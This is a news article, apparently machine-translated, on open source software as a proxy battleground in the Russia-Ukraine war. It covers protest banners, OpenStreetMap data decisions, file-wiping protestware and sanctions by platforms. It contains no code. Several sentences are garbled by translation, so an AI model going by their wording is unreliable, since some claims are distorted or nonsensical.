- Open source software has emerged as a proxy war for armed conflict between Russia and Ukraine.
- This reflects how the war is unfolding on the ground, and projects supporting Ukraine are being attacked.
- Some warn that fallout from more aggressive tactics can destroy critical Internet infrastructure.
After Russia invaded its country, Ukrainian developer Volodymyr Shymanskyy felt compelled to take action.
Already an active founder and contributor to various open source software projects, he has built another site, called StandWithUkraine. The open source page, which has been accessed about 50,000 times, also explains how to boycott an IT company operating in Russia, donate to a Ukrainian organization, and even display a banner of support for other open source projects. doing. The support banner was an immediate hit and was installed in over 1,600 repositories.
However, shortly after launch, it was flooded with a swarm of GitHub tickets calling the project “random.” The messages came from several different accounts, burying actual requests from users for suggestions for new features and reports of technical issues. Shymanskyy believes it is a coordinated attack from Russian developers or allies and has spent hours blocking these accounts.
“We’re not going to turn a blind eye to this situation,” Shymanskyy told Insider. “The open source community will fight back.”
This conflict is only currently being elucidated in the open source world as the war between Russia and Ukraine continues. From developers changing lines of open source code to display “no war” to more controversial tactics such as software jamming for users in Russia’s geographic location, open source is a real force. It has emerged as a proxy war for conflict.
Some projects served as an important source of hope and information, while others caused the spillover effect of software dysfunction. Currently, some community members warn that fallout from more aggressive tactics could be exacerbated and could completely destroy critical Internet infrastructure.
AviPress, CEO of Scarf, an open source distribution tracking tool, said: “It is impossible to actually unravel and deal with the software used in society from the problems of that society. Open source is impossible to unravel from the world in which it is embedded and used.”
Open source software has a long history as “protestware”
Anyone can use, download and modify open source software for free. In short, projects are often built by a community of developers around the world. Because it’s free and so widespread, much of the software you’re using today depends on a variety of open source projects to keep running. Startups of all sizes, and even the world’s largest tech giants like Google and Meta, rely heavily on open source software.
This means that if open source is on the battlefield, your stakes are high.
Open source as a place of activism is nothing new. Open source developers have previously incorporated protests into their code, including creating licenses that limit the use of the software in the event of labor law violations or collaboration with the Immigration and Customs Department. In collaboration with ICE, one developer removed his open source code in protest against software company Chef.
Tech Workers Coalition has set up a cage to protest the contract between GitHub and the Immigration and Customs Department at the entrance to the GitHub Universe conference in San Francisco.
Rosalie Chan / Business Insider
A quick search of GitHub, the go-to provider for hosting open source projects, will find several repositories and discussions on open source activities on topics ranging from police atrocities to voter registration.
“I think open source as a whole was like a move to protest the practice of proprietary software,” Press said. “The OSS movement is a very political and activist idea. Open source has always taken many political positions in many ways.”
Proxy wars reflect how conflicts unfold on the ground
Since the early days of the war, Ukraine has seen the lack of domestic nautical knowledge of the Russian army as a defense tactic. In February, the government agency responsible for the Ukrainian national highway system called on citizens and local governments to “start dismantling nearby road signs immediately.” Also, Ukraine’s newly formed “IT Army” tried to take Russia’s GPS system offline.
At the same time, a group of developers was looking into their open source projects to make sure they didn’t inadvertently help Russian troops navigate the country.
OpenStreetMap is an international project aimed at creating a free open world map built by adding information about where people live.But in the light of the conflict, OpenStreetMap Ukraine Prompted the developer Do not provide mapping data about Ukraine as it may be used for air and missile attacks and rerouting of military vehicles. Vitalii Hapontsev, an OpenStreetMap contributor, told Insiders that both Russian and Ukrainian troops had used OpenStreetMap for military purposes in the past.
Project too Tweet last month Those who show an alliance between Russian residents and the Russian Federation must voluntarily resign from the project.
“Because we are Ukrainian citizens, it is in our true interest to minimize casualties and not provide assistance to our enemies to bring us closer to victory,” Hapontsev said. “But OSM is an international open source project with many applications, so you need to carefully consider your options.”
OpenStreetMap contributor Oleksii Lutskyi feels that public contributions during the invasion “can be more harmful than good and should be avoided”, but Ukrainians resettle and rebuild the town. We hope that this project will be used for humanitarian purposes if necessary.
Developers are using open source software to raise awareness, but some efforts can cause widespread damage.
Just as the developers behind the OpenStreetMap project want it to be available forever, many people who are leveraging open source for war do so to gain support.
For example, in the schematized open source software Draw.io used by Atlassian’s Confluence software customers, we saw some lines of code replaced by “No War” in Ukrainian. Other projects, such as the EventSource and ECMAScript extensions, have seen code changes that return logs of Ukrainian and Russian flag emojis, as well as messages such as “Stop this meaningless war!”. “The Ukrainian people are fully mobilized and ready to protect their country from the enemy,” read another article.
Ukrainian software developer Oleksii Holub felt that coding is his best way, so the best way to warn the world about the Russian invasion is through open source. He then developed a Twitter and Reddit bot called Spelling Ukraine to inform people about the correct Ukrainian spelling of different geographic names instead of the Russian spelling.
Holub has also launched a website where people can search the database for the correct spelling. He says the language is political because Russia denies Ukraine’s own language. Wrong spelling is usually “not a bad thing,” Holb said, but in the current situation it “damages Ukraine’s existence.”
In another recent example, Brandon Nozaki Miller, a developer who maintains open source JavaScript tools, has modified the code for a project he maintains called “peacenotwar.” However, Miller took this protest one step further, as it also contained destructive code that wiped files on the disk system into the code bases of users in geographical locations in Russia and Belarus.
Under vacuum, it may have had little effect. However, Miller added it as a dependency on other software packages. As a result, it interfered with projects that depended on those packages. Liran Tal, head of developer advocacy for cybersecurity firm Snyk, estimates that the destructive code downloads were about 3,000 times. Miller refused to comment on this story.
Some say that more aggressive tactics create a spillover effect on software malfunctions, “which can be very exacerbated.”
Miller’s destructive code is an example of how developers can extensively exploit a complex network of dependencies on web open source projects to distribute malicious code. Developers rely on dozens, if not hundreds, of these packages, and often download many at once.
However, Miller’s case is not unique and can actually be one of the less destructive examples. Earlier this year, Marak Squires, the developer of the JavaScript libraries Colors.js and Faker.js, deliberately interfered with the code to protest the use of the code by large companies and asked the developers to fix the code. I sent scrambling.
These incidents show how much leverage the maintainers have against the software and how they can be used for protests, the press said. Placing a banner on a page is one thing, but some open source protests can completely destroy your infrastructure.
“They can make that choice, basically just put the code in a package and millions of devices have it overnight,” Press said. “The trust we put in the maintainers, it’s already there and it’s really hard to get it back.”
This is becoming a new trend in open source activity, Tal said, adding that his company, Snick, is closely monitoring it.
Snyk co-founders Assaf Hefetz and Guy Podjarny, CEO Peter McKay, and co-founder Danny Grander.
Snyk
In addition to the ubiquity of open source software, the widespread use of these distribution channels opens up risks of its own. Last October, the popular Javascript library was compromised and modified with a malicious package that installs crypto miners, causing a major headache for many developers. Over 1,000 packages depend on tools, and developers downloaded nearly 10 million times in the second week of April.
“It will be difficult to find a domain that is not affected by open source,” Press said. “It was bad, but it could be worse. I was lucky that it was just cryptocurrency mining.”
Technology platforms need to take their own position
Individuals are pushing for open source weaponization in this conflict, but tech companies and the more spectacular geopolitical situation itself have a direct impact.
Russia-targeted sanctions imposed around the world are also open source. Also, while individual maintainers can control the code, tools that make it easy to download and use will give you an accurate picture of what “open” open source should be during the war. Must be owned by a large private company.
GitHub has suspended the accounts of Russian developers connecting to companies licensed by the US government. Other companies are taking more action than required by sanctions. For example, HashiCorp blocked access to the widely used open source tool Terraform in Belarus and Russia in late February.
Anaconda Co-Founder and Chief Executive Officer Peter Wang.
Anaconda
Another large software distribution platform, Anaconda, wants to keep access to Python packages through Russian tools and instead maintain an open channel for software distribution.
The decisions of these companies reflect the deliberations taking place throughout the open source community, where maintainers should take their respective roles, the ethics of each other’s different approaches, and what stance open source companies should take. We are discussing.
“We strive to be the infrastructure of the community,” said Peter Wang, CEO of Anaconda. “When we take action, we have a lot of power, but it brings a lot of responsibility.”
